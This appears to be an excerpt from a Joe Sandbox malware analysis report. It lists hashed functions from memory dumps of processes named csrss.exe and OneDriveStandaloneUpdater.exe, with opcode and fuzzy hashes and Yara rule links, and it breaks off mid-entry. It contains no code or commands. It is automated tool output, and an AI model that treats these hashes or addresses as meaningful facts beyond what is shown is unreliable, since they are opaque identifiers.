Opcode ID: 9f576fe80fb67d8ec96dfb22f58c2f8103ce87442a737e3e6e3e86f04a0e9991
Instruction ID: b894526a414a616a1a935e646539e8339751bc45460f4d01fb17cfd0c2dbdf48
Opcode Fuzzy Hash: 9f576fe80fb67d8ec96dfb22f58c2f8103ce87442a737e3e6e3e86f04a0e9991
Instruction Fuzzy Hash: A232056190D6469FF3B5AB24C8096B5FBD0EF82318F0480B9D44EC7597DE2CAC4A87D5

Function 00007FFAAC4648F1 Relevance: .5, Instructions: 497COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.1715504828.00007FFAAC462000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC462000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffaac462000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44f2f7ab43b7d87b13a5d27e486fd6299bc07e18f78321f10e3d9530f092d29e
Instruction ID: 580d825e8c0755e2edf8b9be826b99e3fc9bf33af336c1d0e99ec3e2ff8b31bd
Opcode Fuzzy Hash: 44f2f7ab43b7d87b13a5d27e486fd6299bc07e18f78321f10e3d9530f092d29e
Instruction Fuzzy Hash: 04F1E661D1D94ADFFBE4DB18C899679BBE1EF96308B509075D00DC319AED28EC0987C8

Function 00007FFAAC4634AF Relevance: .5, Instructions: 490COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.1715504828.00007FFAAC462000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC462000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffaac462000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 582c2352a8ec8a5b09e5c5b5d38668ccd4a5cd78785371693f3544c84d1c8c81
Instruction ID: efad1afd9baedf23f7b6ac04dc93dfa45e095f7a2d51c9e5f16f4152db774ebd
Opcode Fuzzy Hash: 582c2352a8ec8a5b09e5c5b5d38668ccd4a5cd78785371693f3544c84d1c8c81
Instruction Fuzzy Hash: 4DE11A66A089598FE750FBBCE859AECBBA0FFC4325F004477D14DC7257CE2468898B90

Function 00007FFAAC4634D3 Relevance: .5, Instructions: 468COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.1715504828.00007FFAAC462000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC462000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffaac462000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 151a79e77a0536ea32318e16a902f1b14c16038bff3f2ee6f670277a11949e42
Instruction ID: e1c98fb1c17121876dcac5bb23c10b38d19878823add4354f81580e84cc85fb5
Opcode Fuzzy Hash: 151a79e77a0536ea32318e16a902f1b14c16038bff3f2ee6f670277a11949e42
Instruction Fuzzy Hash: A0D12A76A089598FE750FBBCE859AECBBA0FFC5326F004477D14DC6257CD2468898B90

Function 00007FFAAC4635D3 Relevance: .4, Instructions: 357COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.1715504828.00007FFAAC462000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC462000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffaac462000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3daf959d6bdc394c0cef46468a41753def1590f6a2abf42c4f4ca8652b1cc77c
Instruction ID: d67cb134f18cdb9245de5bcee0041f8dc786113264403bac759834c8b1886e1c
Opcode Fuzzy Hash: 3daf959d6bdc394c0cef46468a41753def1590f6a2abf42c4f4ca8652b1cc77c
Instruction Fuzzy Hash: 30B1F976E089598FE750FBBCE859BEDBBA0FF85315F004476D10DD7286CE2458498B90

Function 00007FFAAC462640 Relevance: .3, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.1715504828.00007FFAAC462000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC462000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffaac462000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b50915b5419c216ad746f3f2dcbc70a54ce14e5e7c02750aab706c243cfa179
Instruction ID: 6c7385d4bc3e3dd073631c8681a93518f72592477876610721ec1183f8f32093
Opcode Fuzzy Hash: 0b50915b5419c216ad746f3f2dcbc70a54ce14e5e7c02750aab706c243cfa179
Instruction Fuzzy Hash: DAB1F531A1D64A9FF764EB28C8596B6B7D1EF86318F1480B9D00EC7297CE29EC45C784

Function 00007FFAAC4639E9 Relevance: .2, Instructions: 233COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.1715504828.00007FFAAC462000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC462000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffaac462000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20373dc990dded487113e9638cb5914e4193da0af7ab439ab031a2563d92cddd
Instruction ID: 8dbd41f4a0099162f468252e9fe431abb0d6c50198d2523c7303a75aa3d3556f
Opcode Fuzzy Hash: 20373dc990dded487113e9638cb5914e4193da0af7ab439ab031a2563d92cddd
Instruction Fuzzy Hash: E2812F71D0865D8FEB94EB68C495AADBBF1FF59304F5004B9D00EE7292DB38A985CB40

Function 00007FFAAC4650A9 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.1715504828.00007FFAAC462000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC462000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffaac462000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c8856fc71093b74700608dbf1c91c046c4944ecd3647ba1635a50e002778e8e
Instruction ID: 83150e4c130df0f3866bf1b640eb939ade29ab508ddec6d9b63cce0f3a36f637
Opcode Fuzzy Hash: 3c8856fc71093b74700608dbf1c91c046c4944ecd3647ba1635a50e002778e8e
Instruction Fuzzy Hash: A6310561E0E6894FEB45E76888195F9BBF1EF99310F1841BBD04ED7297CD189C048792

Function 00007FFAAC460A76 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.1715504828.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffaac460000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 980843d232d65b71e6507453474d2491a1449b3e7b0613172fed074de48af97e
Instruction ID: 14564f26efca1b43f737f38df5590c1b9f09f76061ab4c9d5c47145c804fd4fe
Opcode Fuzzy Hash: 980843d232d65b71e6507453474d2491a1449b3e7b0613172fed074de48af97e
Instruction Fuzzy Hash: 3B317C319096198FEB51EB74C459AE9BBF0FF19304F14847AD40AE3196DA38E884CB94

Function 00007FFAAC462488 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.1715504828.00007FFAAC462000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC462000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffaac462000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 936d10b8939fb8014ee2161bae9de69ae0f3608787c780ea8cfa5dc10b25e133
Instruction ID: 08f45db9917bb2667fa0752eed2657900a1f620235200865b7b47b4642ae2992
Opcode Fuzzy Hash: 936d10b8939fb8014ee2161bae9de69ae0f3608787c780ea8cfa5dc10b25e133
Instruction Fuzzy Hash: 6C210771F1891D8BEB94EB6CD80A6FDB3E1EB98320F14417AE40ED3385CD28A84547D1

Function 00007FFAAC4609C1 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.1715504828.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffaac460000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c96c84b0295fc2a34f13c3797b87a76bc3a636c041ecadcdc32fef0633f014cc
Instruction ID: d9d36926c98ba91e2fe8b23aca68e2fb44e0954b0172c22509ca565c859cd169
Opcode Fuzzy Hash: c96c84b0295fc2a34f13c3797b87a76bc3a636c041ecadcdc32fef0633f014cc
Instruction Fuzzy Hash: BD11C611A4EA4B4FF3956768586D6B5AEC1DFA6254B04817BD80EC219ADD48EC0943CC

Function 00007FFAAC46089D Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.1715504828.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffaac460000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d94619ec795998d654e0c91a49c01c96ee54e841c554fc2e6c7d9606df837c43
Instruction ID: bacdc8442a9f4890674427b5b66b4a1c8d1e83a579cc0333254c506f097696b9
Opcode Fuzzy Hash: d94619ec795998d654e0c91a49c01c96ee54e841c554fc2e6c7d9606df837c43
Instruction Fuzzy Hash: C6113A7150DB898FE785E72880681B9BFE0EF96324F04457BE04EC3296DE28D84A87C5

Function 00007FFAAC464EB1 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.1715504828.00007FFAAC462000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC462000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffaac462000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d01344df6f040af33a83cb01b5670dfbee16d5baa57d4efea83e2165edd73f9
Instruction ID: 6bc8c73de343a77de3ad024c3e80d7f52dd3422a1883f59a3c3724d51181a231
Opcode Fuzzy Hash: 9d01344df6f040af33a83cb01b5670dfbee16d5baa57d4efea83e2165edd73f9
Instruction Fuzzy Hash: E411826184F3C55FE70393B4AC695E2BFB4AF43225B0D81E7D489CB0A3E50D595AC3A2

Function 00007FFAAC4609E0 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.1715504828.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffaac460000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f726f8c9ed7861856fc4e9a7188b9b41bfadaea5a6e49ea933c6426dbfa6684d
Instruction ID: 220419e83008f0faf87acedc949acde6da63cc4e905c262372f3c6dd4c915296
Opcode Fuzzy Hash: f726f8c9ed7861856fc4e9a7188b9b41bfadaea5a6e49ea933c6426dbfa6684d
Instruction Fuzzy Hash: 2F01D812B0ED0F4BB2D46A5C685D6B66EC5DFE6694B508237980EC218EDC48EC4A42CC

Function 00007FFAAC460E39 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.1715504828.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffaac460000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a9b0b20654905e9c1a14129d2ed40f5d5096ff16e5c79803221ae73397bcff1
Instruction ID: d237879fb62c2403691a301d6fd3e2b4316397faea6b06bfa89a68af1bac3afd
Opcode Fuzzy Hash: 7a9b0b20654905e9c1a14129d2ed40f5d5096ff16e5c79803221ae73397bcff1
Instruction Fuzzy Hash: CB11C821A0E7C54FE347A33CE4996B4BFD1AF87215B0941F6E04CCA1A7DA58484AC346

Function 00007FFAAC46405F Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.1715504828.00007FFAAC462000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC462000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffaac462000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b16448150079cf05d236ab67c8d309bd97788fcface0b96ea9bb62b2ea7ad25
Instruction ID: 2e8798cbb946c23b7e74f3b19753b2b3dd375eae00a73608830b59e7886408e4
Opcode Fuzzy Hash: 5b16448150079cf05d236ab67c8d309bd97788fcface0b96ea9bb62b2ea7ad25
Instruction Fuzzy Hash: 78F02352F0D9564FFF98E76C544E5FCA7E1DF55225B64603AD14EC318AEC149C0A03C5

Function 00007FFAAC464F11 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.1715504828.00007FFAAC462000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC462000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffaac462000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 450448f1c6833cbac9643a33780a2aa3a1ada607152947bcaa8ddfb64e0bfad8
Instruction ID: 20ac71bc095c8544b9749d197931821c031a2cdf2b13fc1798b24d4ddcf47b6c
Opcode Fuzzy Hash: 450448f1c6833cbac9643a33780a2aa3a1ada607152947bcaa8ddfb64e0bfad8
Instruction Fuzzy Hash: 7E019960A0E2824BF71F933885643F8AB519F83328F0481F5C04ECA0DBDC1D989A83D5

Function 00007FFAAC46518D Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.1715504828.00007FFAAC462000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC462000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffaac462000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7901140b94835b54c5a60a6fb6ae5cd31b18b1f3bb70515f11f869f49d71e8ed
Instruction ID: 9e762bac3268c797fa086fdee82ee1bcfbf4943c9f8f437ee2cfcb7419cb952c
Opcode Fuzzy Hash: 7901140b94835b54c5a60a6fb6ae5cd31b18b1f3bb70515f11f869f49d71e8ed
Instruction Fuzzy Hash: 6FF08C75F0950E8BFF94EA9C98491FEB3E1EB98314B144475D40EE3289CD28A90687D0

Function 00007FFAAC460DF6 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.1715504828.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffaac460000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbc62f98c61db7b9cc888fcf46f50ce43375d176f6f3a66cf450fd5e86c292a1
Instruction ID: 2851392e1137cfdb1728625987c6d770bbece55960d4fee8de3c33a62ea6325e
Opcode Fuzzy Hash: dbc62f98c61db7b9cc888fcf46f50ce43375d176f6f3a66cf450fd5e86c292a1
Instruction Fuzzy Hash: D9E02B7290DA4C6FBB08AA59FC07CF67F98DA87234B00015FF19EC2553E112A4638699

Function 00007FFAAC463C81 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.1715504828.00007FFAAC462000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC462000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffaac462000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebc0863801cdb0b979ee1f4bcfef6f7d864774cf891317ab6841e1c72f7ac818
Instruction ID: 5e73f64a4814703d5e0942579191a6d389c5b127fab5824d75204a746117fc75
Opcode Fuzzy Hash: ebc0863801cdb0b979ee1f4bcfef6f7d864774cf891317ab6841e1c72f7ac818
Instruction Fuzzy Hash: 54E06F328ADA8C8BEB10AB1CBC042C8B6A0FB8930CF0002A9E00CC3080C3218668C749

Function 00007FFAAC464D65 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.1715504828.00007FFAAC462000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC462000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffaac462000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 865ad34fc0576191e23776b4fb08cb7bb5c4f1de8546fd324711fff902e41e36
Instruction ID: 7f79320e9619f1947bf4e1e07cb252f64b67d2771b731da05af7c8be2db6023f
Opcode Fuzzy Hash: 865ad34fc0576191e23776b4fb08cb7bb5c4f1de8546fd324711fff902e41e36
Instruction Fuzzy Hash: 1DE0D83185DA0DCBDF44E7999C452E976A4FB49308F000169E04CC3185D7359955C789

Function 00007FFAAC460CC0 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.1715504828.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffaac460000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8c2d487488405c36c0a9bd1ee3b06780460699363547f198c61ce37a036fd60
Instruction ID: e4f736d6d11eee08a8323d54cecbcb78701db8c8b66dc7991e089f2afe1a774f
Opcode Fuzzy Hash: c8c2d487488405c36c0a9bd1ee3b06780460699363547f198c61ce37a036fd60
Instruction Fuzzy Hash: 8CC02B13BCE90E099E006068FC40CE1F380C7401303504A33C80BC1008DC1B94C10340

Non-executed Functions

Function 00007FFAAC4645AA Relevance: 5.2, Strings: 4, Instructions: 173COMMON

Download Yara Rule

Strings

H, xrefs: 00007FFAAC4645DC
(0, xrefs: 00007FFAAC464638
(0, xrefs: 00007FFAAC464621
r6, xrefs: 00007FFAAC4645AE

Memory Dump Source

Source File: 00000027.00000002.1715504828.00007FFAAC462000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC462000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffaac462000_csrss.jbxd

Similarity

API ID:
String ID: (0$(0$H$r6
API String ID: 0-147897198
Opcode ID: 66c0dfd52c364994366cb212bafbd3e7d86771e614e9e41bedf03b9317543f0b
Instruction ID: 091f79349b6199a6854670efa80dd4ddadd2bb5fc23031bd3011a36f51a00f45
Opcode Fuzzy Hash: 66c0dfd52c364994366cb212bafbd3e7d86771e614e9e41bedf03b9317543f0b
Instruction Fuzzy Hash: 7141A551B19E4E4BEFC8DB6C9499AB563C1EBA8315710917AD80FC729BED28DC068384

Analysis Process: OneDriveStandaloneUpdater.exePID: 7436, Parent PID: 4056COMMON

Executed Functions

Function 00007FFAAC471222 Relevance: .4, Instructions: 393COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000028.00000002.1786671402.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_7ffaac470000_OneDriveStandaloneUpdater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78f7c6d4da26038cff6b3182bc01865a24266e1e2881ee2d6dd6185431dab9df
Instruction ID: 0b1b2b6ca3a5d97485c3cfd4960530ecda2d5afee769f558acb0916075dd97e4
Opcode Fuzzy Hash: 78f7c6d4da26038cff6b3182bc01865a24266e1e2881ee2d6dd6185431dab9df
Instruction Fuzzy Hash: A7C16A2191E69A8FF75A9B38C4596B53BE1EF47324F0480BAD48FC7197ED1CE8468381

Function 00007FFAAC470EB5 Relevance: 6.5, Strings: 5, Instructions: 286COMMON

Download Yara Rule

Strings

r6, xrefs: 00007FFAAC4710CE
r6, xrefs: 00007FFAAC471058
r6, xrefs: 00007FFAAC470FF0
r6, xrefs: 00007FFAAC47102D
r6, xrefs: 00007FFAAC4710F5

Memory Dump Source

Source File: 00000028.00000002.1786671402.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_7ffaac470000_OneDriveStandaloneUpdater.jbxd

Similarity

API ID:
String ID: r6$r6$r6$r6$r6
API String ID: 0-2079928309
Opcode ID: dabaf3f7bc04d927276c9474052014793686f3d00d35cc0a2eb894621f2db393
Instruction ID: c47401de4ca55153c40308d41e6c9d6c3207a48fca8bd55e448813d119bbc448
Opcode Fuzzy Hash: dabaf3f7bc04d927276c9474052014793686f3d00d35cc0a2eb894621f2db393
Instruction Fuzzy Hash: 0081B571A09A5D8FEB98EB68C4597FDBBE2EF99310F044179D04ED3292DD24AC0687C1

Function 00007FFAAC470B85 Relevance: 1.4, Strings: 1, Instructions: 134COMMON

Download Yara Rule

Strings

X, xrefs: 00007FFAAC470BBF

Memory Dump Source

Source File: 00000028.00000002.1786671402.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_7ffaac470000_OneDriveStandaloneUpdater.jbxd

Similarity

API ID:
String ID: X
API String ID: 0-3240521626
Opcode ID: 8ee3eda9b0ae56c353904f8b5c06d6bb68a451e6887e99f24b56eef11184655d
Instruction ID: 22aa2a82797b73021e513ac18e17700a671ccc63230c969539b03e5909444906
Opcode Fuzzy Hash: 8ee3eda9b0ae56c353904f8b5c06d6bb68a451e6887e99f24b56eef11184655d
Instruction Fuzzy Hash: 5F412B6165DA454FE784EB7CC499EB67BE2EF99304B1481B5E00EC3297CD28EC468781

Function 00007FFAAC470CDA Relevance: 1.4, Strings: 1, Instructions: 130COMMON

Download Yara Rule

Strings

(L, xrefs: 00007FFAAC470D21

Memory Dump Source

Source File: 00000028.00000002.1786671402.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_7ffaac470000_OneDriveStandaloneUpdater.jbxd

Similarity

API ID:
String ID: (L
API String ID: 0-2945913762
Opcode ID: d63f367f4fdcb85569c394a1679c71e49f387baf9c3caa1496e50371644ceba9
Instruction ID: e0a68839ca0dbe556c3bedadc99a574877ace4b6b5554d20214b8d211229dacb
Opcode Fuzzy Hash: d63f367f4fdcb85569c394a1679c71e49f387baf9c3caa1496e50371644ceba9
Instruction Fuzzy Hash: 0531DA62A1DB444FF7589768D40A6B97BD1EF99314F04017EF08EC31C3DD28A80683D6

Function 00007FFAAC47276D Relevance: .7, Instructions: 679COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000028.00000002.1786671402.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_7ffaac470000_OneDriveStandaloneUpdater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9ab6a9196b09b5e0868dcde67f2546ad7780d3bd4fa12c3f7ae4461f23f7d46
Instruction ID: e67a574ebfe8d62438e89c7b61b25cbe516f15a71cfe78ebeced60fb3fa15312
Opcode Fuzzy Hash: a9ab6a9196b09b5e0868dcde67f2546ad7780d3bd4fa12c3f7ae4461f23f7d46
Instruction Fuzzy Hash: 3232246190D696CFF3B5AB24C8096B97BE0EF42314F0580B9D44EC7993DE2CAC4A87D5

Function 00007FFAAC4734AF Relevance: .5, Instructions: 490COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000028.00000002.1786671402.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_7ffaac470000_OneDriveStandaloneUpdater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec9f2c1ae892abbf0d4668f9fca3b89fd0c1102612f7aa95aec3e46cb2338183
Instruction ID: c70e955a45671734fc04d5a22432db05c49a042ff1f13bf057555e2572fac374
Opcode Fuzzy Hash: ec9f2c1ae892abbf0d4668f9fca3b89fd0c1102612f7aa95aec3e46cb2338183
Instruction Fuzzy Hash: 32E12772A48A298FE750FBBCE859AEDBBA0FF44365F00417BD14DD6293CE2464458B90

Function 00007FFAAC4748F1 Relevance: .5, Instructions: 483COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000028.00000002.1786671402.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_7ffaac470000_OneDriveStandaloneUpdater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 520e1a16673d46edf7f4fae9909070b9513378ac5f99047b53913352a459ab97
Instruction ID: 7bcfc2630620f65db832243c974259b892ce8e0bfb5112f118aac2b8e3461ec4
Opcode Fuzzy Hash: 520e1a16673d46edf7f4fae9909070b9513378ac5f99047b53913352a459ab97
Instruction Fuzzy Hash: A8F11761D1D92ACFF7A4DB1C888967937E1FF96308B509475D00DD3292DD28EC098BC9

Function 00007FFAAC4734D3 Relevance: .5, Instructions: 468COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000028.00000002.1786671402.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_7ffaac470000_OneDriveStandaloneUpdater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0bb9e946e06b286fe1a84975182166ee3010a061c6a21cc160d243ee62700e1
Instruction ID: 95310eaff275957215db8d8b54d1f0def50402ab2cd092b341ca478f66ce3e8f
Opcode Fuzzy Hash: e0bb9e946e06b286fe1a84975182166ee3010a061c6a21cc160d243ee62700e1
Instruction Fuzzy Hash: 92D11872A489298FE750FBBCE859AFDBBA0FF45361F00417BD14DD6293CE2464458B90

Function 00007FFAAC4735D3 Relevance: .4, Instructions: 357COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000028.00000002.1786671402.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_7ffaac470000_OneDriveStandaloneUpdater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4bb4cf4663fbc26bbc74d8b93ce07011cb6a86327b9e45ab0708ba2ef706dc1
Instruction ID: b8cec385ea3327c0f45a578e54f9dd4be935ab97fdccd23f3144f66bd3e980e4
Opcode Fuzzy Hash: e4bb4cf4663fbc26bbc74d8b93ce07011cb6a86327b9e45ab0708ba2ef706dc1
Instruction Fuzzy Hash: C0B1E672E199298FE754FBBCE859AEDBBA0FF45361F00417BD10DD7282CE2498458B90

Function 00007FFAAC472640 Relevance: .3, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000028.00000002.1786671402.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_7ffaac470000_OneDriveStandaloneUpdater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67b575b87199a5cbbb0d3a6b41f1719984de65c42b08db499965ecd4a518e530
Instruction ID: 76fdb4b52b73276f1b35f4bd8106a053a9ed7d1b583f79232f1123d1ca9be550
Opcode Fuzzy Hash: 67b575b87199a5cbbb0d3a6b41f1719984de65c42b08db499965ecd4a518e530
Instruction Fuzzy Hash: 19B1D571A0DA5ACFF764EB28C85967A7791EF86314F1480B9D00EC7683CE29EC46C784

Function 00007FFAAC4739E9 Relevance: .2, Instructions: 233COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000028.00000002.1786671402.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_7ffaac470000_OneDriveStandaloneUpdater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c163d2f3e1303a21da6753d3e558cf8d4df54538bdd93b7a2330b355652b96f7
Instruction ID: 5eb2f11e9d5c3ef8b69d6cb2e1a0cc582b6636ecb68a1c1b4155a71483ebdd21
Opcode Fuzzy Hash: c163d2f3e1303a21da6753d3e558cf8d4df54538bdd93b7a2330b355652b96f7
Instruction Fuzzy Hash: 49811D71D08A1DCFEB54EB68C495AAD7BF1FF59304F5004B9D00EE7291DA38A985CB40

Function 00007FFAAC4750A9 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000028.00000002.1786671402.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_7ffaac470000_OneDriveStandaloneUpdater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6312ddfaba0504cc3f09748d76c71ecba8dccb7d43370cb627835d4be80e231
Instruction ID: d2ce507459b1bb66b8764d3c841f8ed55675b39f7507a2aed85d6d093e78528c
Opcode Fuzzy Hash: c6312ddfaba0504cc3f09748d76c71ecba8dccb7d43370cb627835d4be80e231
Instruction Fuzzy Hash: 9B313561E0E6898FEB45E76888195B97BF1EF89311F0941FBD00ED7293CD189C058792

Function 00007FFAAC470A76 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000028.00000002.1786671402.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false

Joe Sandbox IDA Plugin

